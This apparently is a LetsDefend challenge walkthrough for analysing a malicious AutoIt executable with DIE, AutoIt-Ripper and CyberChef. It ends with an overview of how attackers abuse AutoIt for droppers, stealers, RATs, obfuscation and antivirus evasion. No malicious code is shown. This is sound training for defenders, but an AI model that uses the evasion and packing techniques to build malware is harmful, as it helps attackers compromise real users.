Back to Walkthroughs
Malware Challenge (Malicious AutoIT)
Let's Defend Malware Analysis [Beginner]Beginner

Malware Challenge (Malicious AutoIT)

#tutorial

Challenge Description

image image

Solution and Analysis

This entire challenge has been solved using the provided Let'sDefend analysis VM.

First, we are given a malware sample in a password-protected archive. Unzip it using the password infected.

Question 1: What is the MD5 hash of the sample file?

To find the hash, we can use the HashCalc tool located in the C:\Tools directory on the desktop.

Open HashCalc.

Drag and drop the unzipped sample.exe file into the application window.

The MD5 hash will be calculated and displayed automatically.

alt text

Question 2: According to the Detect It Easy (DIE) tool, what is the entropy of the sample file?

We will use Detect It Easy (DIE), also found in the C:\Tools directory, for static analysis.

Open DIE and drag the sample.exe file into the main window.

After the file is loaded, click on the "Entropy" button in the top menu.

alt text

A new window will appear showing the entropy graph and values. The answer is the value for Total entropy.

alt text

Question 3: According to the Detect It Easy (DIE) tool, what is the virtual address of the “.text” section?

On the main DIE screen, locate the "Sections" category and click the arrow to expand it. The virtual address for the .text section is the value you are looking for.

alt text

alt text

Question 4: According to the Detect It Easy (DIE) tool, what is the “time date stamp”?

The "Time date stamp" is visible on the main DIE screen within the PE header information, typically located near the "Sections" category.

Question 5: According to the Detect It Easy (DIE) tool, what is the entry point address of the executable?

This value is also on the main screen, labeled as "Entry point". It is usually found right next to the "Base address".

Question 6: What is the domain used by the malicious embedded code?

The malware is an AutoIt executable. To find the domain, we need to decompile the script embedded within the .exe file. We will use the AutoIt-Ripper tool.

Navigate to the C:\Tools\AutoIt-Ripper directory.

Right-click inside the folder and select "Open in Terminal" or "Open PowerShell window here".

Run the following command to extract the source script from the malware sample. This command tells the ripper to analyze sample.exe and place the results in a new folder named output.

python -m autoit_ripper.cli C:\Users\LetsDefend\Desktop\ChallengeFile\sample.exe output

A new output folder will be created. Inside, you will find the decompiled script, sample.au3.

alt text

Open sample.au3 with a text editor like Notepad++. By examining the code, you can easily spot the domain name stored in a variable.

alt text

Question 7: What is the file path encoded in hexadecimal in the malicious code?

In the same .au3 script, a few lines below the domain, there is a variable holding a long hexadecimal string.

alt text

Copy this hex string and use a tool like CyberChef to convert it "From Hex" to text. This will reveal the hidden file path.

Question 8: What is the name of the DLL called by the malicious code?

To find the DLL, examine the script for functions that interact with external libraries. Specifically, look for a DllCall() function. The first argument passed to this function is the name of the DLL file being called. The last few lines of the code should contain this function call.

About AutoIt and Its Role in Malware

What is AutoIt? (The Legitimate Tool)

AutoIt (pronounced auto-it) is a freeware scripting language designed for automating tasks on the Microsoft Windows graphical user interface (GUI). In simple terms, it's a tool that lets system administrators and power users write scripts to simulate keystrokes, mouse movements, and window control manipulation.

Its legitimate uses include:

  • Automating Repetitive Tasks: Automating software installations, changing system settings, or performing routine maintenance across many computers.
  • Software Testing: Creating scripts to test GUIs by automatically clicking buttons, filling forms, and verifying outputs.
  • System Management: Building simple tools for common IT functions.

One of its most important features is the Aut2Exe compiler, which bundles an AutoIt script (.au3) with the AutoIt interpreter into a single, standalone executable file (.exe). This means you can run the script on any Windows machine, even if AutoIt isn't installed.

Why Do Malware Authors Abuse AutoIt?

The very features that make AutoIt a useful administrative tool also make it an attractive platform for malware authors. It's often described as a "dual-use" tool.

Here’s why it's so commonly used for malicious purposes:

  1. Ease of Use: AutoIt has a simple, BASIC-like syntax, making it incredibly easy to learn and write malicious scripts quickly without needing deep programming knowledge in languages like C++ or C#.

  2. Standalone Executables: The ability to compile scripts into a single .exe is a massive advantage for attackers. It allows them to package their malware into a portable file that can be easily distributed via email, malicious downloads, or other methods.

  3. Evasion of Antivirus (AV) and Analysis:

    • Wrapper Functionality: The final compiled executable is a legitimate AutoIt interpreter. Because of this, some signature-based antivirus solutions may not immediately flag the file as malicious. The malicious code is essentially "data" inside the legitimate program until it's executed.
    • Difficult Static Analysis: A compiled AutoIt executable isn't a standard PE file with machine code. Traditional disassemblers like IDA Pro can't easily analyze it. An analyst must first decompile or extract the script using tools like AutoIt-Ripper or Exe2Aut.
    • Heavy Obfuscation: The script itself can be heavily obfuscated. Malware authors use techniques like string concatenation, character code encoding (Chr()), string reversal, and custom encryption to hide domains, file paths, and commands, making the decompiled code difficult to read.

  4. Powerful System Access: AutoIt provides all the functions a malware author needs to control a system, including:

    • Downloading and executing files (InetGet, Run).
    • Reading and writing to the Windows Registry (RegRead, RegWrite).
    • Injecting code into other processes.
    • Logging keystrokes and stealing data.
    • Connecting to command-and-control (C2) servers (TCPConnect).

Common Types of AutoIt Malware

Because of its flexibility, AutoIt is used to create several types of malware:

  • Droppers & Downloaders: This is the most common use. A small, simple AutoIt script serves as the first stage of an attack. Its only job is to contact a malicious server, download a more powerful payload (like ransomware, a banking trojan, or a Remote Access Trojan), save it to the disk, and execute it.
  • Information Stealers: Scripts designed to search the victim's computer for sensitive information like saved passwords in browsers, cryptocurrency wallets, or confidential documents, and then upload them to an attacker's server.
  • Backdoors & RATs: More complex scripts that establish a persistent connection to a C2 server, allowing an attacker to send commands and control the infected machine remotely.
  • Packers/Crypters: An AutoIt script can be used as a "packer" to wrap another malicious executable. The inner malware is encrypted and stored as a resource. The AutoIt script's sole purpose is to decrypt this payload in memory and execute it, bypassing AV scans that would have detected the original, unencrypted malware.